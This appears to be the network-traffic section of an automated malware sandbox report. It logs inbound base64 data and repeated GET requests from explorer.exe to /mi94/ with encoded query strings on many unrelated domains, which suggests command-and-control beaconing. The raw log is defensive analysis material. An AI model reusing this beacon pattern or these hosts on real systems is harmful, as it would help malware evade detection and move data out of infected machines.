Mar 27, 2023 14:05:56.150326967 CEST	444	IN	Data Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
Mar 27, 2023 14:05:56.150383949 CEST	445	IN	Data Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
Mar 27, 2023 14:05:56.150439978 CEST	447	IN	Data Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
Mar 27, 2023 14:05:56.150495052 CEST	448	IN	Data Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
Mar 27, 2023 14:05:56.282133102 CEST	450	IN	Data Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.11.20	49859	34.117.168.233	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:10:03.027214050 CEST	534	OUT	GET /mi94/?uZgtA=4Tl7mkmR2hfQ9KBizErbd2os7QrtMSS1Xe9D2XLoGouUMWTPUZ0bimWLWeFNR5N6++45&G6GdR=axl0 HTTP/1.1 Host: www.lapalmaaccesible.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 27, 2023 14:10:03.093939066 CEST	536	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 27 Mar 2023 12:10:03 GMT Content-Length: 0 location: https://www.lapalmaaccesible.com/mi94?uZgtA=4Tl7mkmR2hfQ9KBizErbd2os7QrtMSS1Xe9D2XLoGouUMWTPUZ0bimWLWeFNR5N6++45&G6GdR=axl0 strict-transport-security: max-age=3600 x-wix-request-id: 1679919003.036214019155111169 Age: 0 X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfppWgLIEGkYABcYufcc5cq,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=,2d58ifebGbosy5xc+FRalijvZd0CgvtyeTkcuc0PEYEDExOkNOmIL7sBspfm0loOjoe2GMQJ/MdiMK4Y/vI70/GYpY0jwc2V0ffjEpF8ZOk=,2UNV7KOq4oGjA5+PKsX47NTaFvZEsXIsLVjEfrvlXStWd3xniMsr1HjrszKGvMzr,7npGRUZHWOtWoP0Si3wDp7WuSH68sZSiNuj4ZnGbshE=,xTu8fpDe3EKPsMR1jrheENj+vnKE0n+VZnRbyAFT98w=,WDMzHiyOL7uW518fW2Byr9h1Jps97fZsy7ZgWtNVA3AMjGLD9Q99/8pMpisT30dzWIHlCalF7YnfvOr2cMPpyw== Cache-Control: no-cache server-timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3_g X-Content-Type-Options: nosniff Server: Pepyaka/1.19.10 Via: 1.1 google Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.11.20	49861	142.250.181.243	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:10:43.353358030 CEST	544	OUT	GET /mi94/?uZgtA=ORIqx8IF1+X+2hN52P87hXte5s/HoBMDp1q1F2AtNmI3dmVw+3KXXOfhBFQ6DTUSnU2z&G6GdR=axl0 HTTP/1.1 Host: www.edelman-production.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 27, 2023 14:10:43.464946985 CEST	544	IN	HTTP/1.1 301 Moved Permanently Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 27 Mar 2023 12:10:43 GMT Location: https://www.edelman-production.com/mi94/?uZgtA=ORIqx8IF1+X+2hN52P87hXte5s/HoBMDp1q1F2AtNmI3dmVw+3KXXOfhBFQ6DTUSnU2z&G6GdR=axl0 Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.11.20	49864	185.53.179.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:11:33.376861095 CEST	559	OUT	GET /mi94/?YtxdA=ClrLPvDXABoDT8&uZgtA=wX1E+PP8GJLUwW4mj+Nza6lWe8cbBzPUrOMOJyU3aq2wOfqE4jFrkNQnwJ4n6caLvu5m HTTP/1.1 Host: www.credit-cards-54889.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 27, 2023 14:11:33.395869017 CEST	559	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Mon, 27 Mar 2023 12:11:33 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.11.20	49865	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:11:45.513856888 CEST	560	OUT	GET /mi94/?uZgtA=DdTnYTdsvxFdVgqd/vVQw4Ms7Aw/OPz+4Pu9rQ+4bXN8JsUKt08leuavRNawr2d0j4jE&YtxdA=ClrLPvDXABoDT8 HTTP/1.1 Host: www.licensescape.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 27, 2023 14:11:45.525955915 CEST	560	IN	HTTP/1.1 410 Gone Server: openresty Date: Mon, 27 Mar 2023 12:11:45 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 63 65 6e 73 65 73 63 61 70 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='0; url=http://www.licensescape.com/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.11.20	49867	202.95.14.233	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:12:05.967515945 CEST	568	OUT	GET /mi94/?YtxdA=ClrLPvDXABoDT8&uZgtA=9d/LjZG6HsJ3NNhq1rA+PmL3FctD92E4WX5AE58IVInBpcqC/aiyhlqcUifd684qA43E HTTP/1.1 Host: www.emiu6696.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 27, 2023 14:12:06.181008101 CEST	568	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 Mar 2023 12:12:06 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.11.20	49868	64.190.63.111	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:12:26.472981930 CEST	569	OUT	GET /mi94/?uZgtA=RrYIP0/eJgYl3SedIjrrJhoixcqEaFywGW8DIhJA710ua/O2pKo7Jyh/i2knDDaGCnub&YtxdA=ClrLPvDXABoDT8 HTTP/1.1 Host: www.dinero.news Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 27, 2023 14:12:26.514091015 CEST	570	IN	HTTP/1.1 200 OK date: Mon, 27 Mar 2023 12:12:26 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.9 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_FipZ4iTYvp9opT1tilrdWTzTYAhN846t4n96FkQXxMdRDKWVhU9XWcZ9ldKOYvVkuhV0+rTSLyGCl0qXRVLIZA== last-modified: Mon, 27 Mar 2023 12:12:26 GMT x-cache-miss-from: parking-5c9f5b7fbd-47wmt server: NginX connection: close Data Raw: 32 43 46 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 46 69 70 5a 34 69 54 59 76 70 39 6f 70 54 31 74 69 6c 72 64 57 54 7a 54 59 41 68 4e 38 34 36 74 34 6e 39 36 46 6b 51 58 78 4d 64 52 44 4b 57 56 68 55 39 58 57 63 5a 39 6c 64 4b 4f 59 76 56 6b 75 68 56 30 2b 72 54 53 4c 79 47 43 6c 30 71 58 52 56 4c 49 5a 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 64 69 6e 65 72 6f 2e 6e 65 77 73 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 44 69 65 73 65 20 57 65 62 73 69 74 65 20 73 74 65 68 74 20 7a 75 6d 20 56 65 72 6b 61 75 66 21 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 7a 75 6d 20 54 68 65 6d 61 20 64 69 6e 65 72 6f 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 69 65 73 65 20 57 65 62 73 69 74 65 20 73 74 65 68 74 20 7a 75 6d 20 56 65 72 6b 61 75 66 21 20 64 69 6e 65 72 6f 2e 6e 65 77 73 20 69 73 74 20 64 69 65 20 62 65 73 74 65 20 51 75 65 6c 6c 65 20 66 Data Ascii: 2CF<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_FipZ4iTYvp9opT1tilrdWTzTYAhN846t4n96FkQXxMdRDKWVhU9XWcZ9ldKOYvVkuhV0+rTSLyGCl0qXRVLIZA==><head><meta charset="utf-8"><title>dinero.news - Diese Website steht zum Verkauf! - Informationen zum Thema dinero.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="Diese Website steht zum Verkauf! dinero.news ist die beste Quelle f
Mar 27, 2023 14:12:26.514168978 CEST	572	IN	Data Raw: c3 bc 72 20 61 6c 6c 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 64 69 65 20 53 69 65 20 73 75 63 68 65 6e 2e 20 56 6f 6e 20 61 6c 6c 67 65 6d 65 69 6e 65 6e 20 54 68 65 6d 65 6e 20 62 69 73 20 68 69 6e 20 7a 75 20 73 70 65 7a 69 65 6c 6c 65 Data Ascii: r alle Informationen die Sie suchen. Von allgemeinen Themen bis hin zu speziellen Sachverhalten, finden 15F2Sie auf dinero.news alles. Wir hoffen, dass Sie hier das Gesuchte finden!"><link rel="icon" type="image/png"
Mar 27, 2023 14:12:26.514230013 CEST	573	IN	Data Raw: 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 Data Ascii: g{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],
Mar 27, 2023 14:12:26.514285088 CEST	574	IN	Data Raw: 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 Data Ascii: ay:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{colo
Mar 27, 2023 14:12:26.514341116 CEST	575	IN	Data Raw: 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 Data Ascii: {display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-tex
Mar 27, 2023 14:12:26.514415026 CEST	577	IN	Data Raw: 66 74 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c Data Ascii: ft:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;back
Mar 27, 2023 14:12:26.514509916 CEST	578	IN	Data Raw: 63 6f 6e 64 61 72 79 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d Data Ascii: condary:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-colo
Mar 27, 2023 14:12:26.514575958 CEST	579	IN	Data Raw: 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 37 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e Data Ascii: ;display:flex;position:relative;max-width:1700px;margin:0 auto !important}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-
Mar 27, 2023 14:12:26.514662981 CEST	581	IN	Data Raw: 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d Data Ascii: o-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-l
Mar 27, 2023 14:12:26.514725924 CEST	582	IN	Data Raw: 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f Data Ascii: ist-element-link:hover,.webarchive-block__list-element-link:active,.webarchive-block__list-element-link:focus{text-decoration:underline}body{margin:0}.domain h1{font-size:2.2em;font-weight:normal;text-decoration:none;text-transform:lowercase;c
Mar 27, 2023 14:12:26.525616884 CEST	584	IN	Data Raw: 35 4d 54 6b 78 4e 44 59 6d 64 47 4e 70 5a 44 31 33 64 33 63 75 5a 47 6c 75 5a 58 4a 76 4c 6d 35 6c 64 33 4d 32 4e 44 49 78 4f 44 67 79 59 54 64 68 4d 44 6b 78 4e 79 34 7a 4f 54 63 79 4e 54 49 33 4e 69 5a 30 59 58 4e 72 50 58 4e 6c 59 58 4a 6a 61 Data Ascii: 5MTkxNDYmdGNpZD13d3cuZGluZXJvLm5ld3M2NDIxODgyYTdhMDkxNy4zOTcyNTI3NiZ0YXNrPXNlYXJjaCZkb21haW49ZGluZXJvLm5ld3MmYV9pZD0xJnNlc3Npb249QjZVOWxrRGktTG9JdldMeklhcnkmdHJhY2txdWVyeT0x"},"imprintUrl":false,"contactUsUrl":false,"contentType":5,"t":"conten

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49844	198.54.117.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:06:36.076587915 CEST	474	OUT	GET /mi94/?uZgtA=yKcY3jotfSPLyB/ftSMp74iudURdb3SAsX12brKJ4aUNBvL8L7J7V3FDmQx4l6kHWp2H&G6GdR=axl0 HTTP/1.1 Host: www.anotherworldrecord.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49846	198.54.117.215	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:07:17.518927097 CEST	482	OUT	GET /mi94/?uZgtA=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&G6GdR=axl0 HTTP/1.1 Host: www.crosswalkconsulting.co.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49848	195.179.237.158	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2023 14:07:38.383358955 CEST	489	OUT	GET /mi94/?uZgtA=zH93CAcCrit8Ot+ZBqn/vyMyC45co0bQrrnuYMPQl4K63vhoNC/Ny1DoALksFDMvrnCN&G6GdR=axl0 HTTP/1.1 Host: www.funtime28.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 27, 2023 14:07:38.532325983 CEST	490	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Mon, 27 Mar 2023 12:07:38 GMT server: LiteSpeed location: https://www.funtime28.online/mi94/?uZgtA=zH93CAcCrit8Ot+ZBqn/vyMyC45co0bQrrnuYMPQl4K63vhoNC/Ny1DoALksFDMvrnCN&G6GdR=axl0 platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 